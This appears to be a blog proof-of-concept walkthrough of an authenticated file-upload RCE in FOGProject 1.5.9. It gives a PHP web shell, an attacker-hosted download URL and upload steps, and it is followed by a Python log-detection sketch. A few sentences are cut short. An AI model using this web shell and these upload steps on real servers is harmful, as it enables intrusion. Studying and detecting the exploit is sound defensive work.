Hello guys, I will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated), which was disclosed not too long ago, so I will be exploiting one for a proof of concept.
We have the victim machine ready, so let's log in with the FOGProject default credentials, which is
password and we should have access to the dashboard.
Now time for the fun part: going to the attacking machine, let's create an empty 10 MB file.
dd if=/dev/zero of=myshell bs=10485760 count=1
Now let's add our PHP payload to the end of the file we just created.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
Now we need to make our myshell file accessible through HTTP. I will be using SimpleHTTPServer for that, or you can easily copy myshell to your
It is in the same folder where I have myshell. Now let's base64-encode the URL of the myshell file (replacing Attacker-IP); that is my IP, because the myshell file is hosted on my machine.
echo "http://Attacker-IP/myshell" | base64
Now let's visit the URL.
http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64
NOTE: we add the myshell that we encoded in base64.
Now change the Kernel Name (bzImage32) to myshell.php and click on Install. We should get Download Started; give it time and we should see Transfer Succeeded.
Nice, our file has been uploaded. We can confirm it by checking the SimpleHTTPServer we started.
Now let's access our uploaded file through its URL to get remote code execution.
Boom, and we have remote code execution; you can go ahead and get a reverse shell or do anything.
Greeting From Muzec
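For defenders, the kernel-update request shown above leaves a clear trace in the web server's access log: the `file` parameter is just a base64-encoded download URL. The following detection sketch is an added example, not part of the original post or of FOGProject; the allowlisted host, the log format and all function names are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts your FOG server is expected to fetch kernels from.
ALLOWED_KERNEL_HOSTS = {"kernels.example.org"}  # hypothetical allowlist
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_kernel_url(target):
    """Return the URL hidden in `file=` of a kernel-update request, else None."""
    path, _, query = target.partition("?")
    params = parse_qs(query)
    is_kernel = params.get("node") == ["about"] and params.get("sub") == ["kernel"]
    if not (path.endswith("/management/index.php") and is_kernel and "file" in params):
        return None
    raw = params["file"][0].replace(" ", "+")  # parse_qs turns '+' into ' '
    try:
        decoded = base64.b64decode(raw + "=" * (-len(raw) % 4))
    except (binascii.Error, ValueError):
        return "<undecodable>"
    # `echo ... | base64` also encodes a trailing newline, so strip whitespace.
    return decoded.decode("utf-8", "replace").strip()

def suspicious_kernel_requests(log_lines):
    """Return (client, decoded_url) for kernel fetches from non-allowlisted hosts."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        url = decode_kernel_url(match.group(1)) if match else None
        if url is None:
            continue
        if (urlsplit(url).hostname or "") not in ALLOWED_KERNEL_HOSTS:
            hits.append((line.split()[0], url))
    return hits

# Constructed sample access-log lines (combined log format).
_ok = base64.b64encode(b"https://kernels.example.org/bzImage").decode()
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /fog/management/index.php'
    f'?node=about&sub=kernel&file={_ok}&arch=arm64 HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2021:10:05:00 +0000] "GET //fog/management/index.php'
    '?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2021:10:06:00 +0000] "GET /fog/management/index.php?node=home HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, url in suspicious_kernel_requests(SAMPLE_LOG):
        print(f"kernel fetch from unexpected host: client={client} url={url}")
```

The Install step itself is a form submission, so the renamed kernel file does not appear in the access log; pair this check with monitoring for script extensions among the files the FOG server stores as kernels.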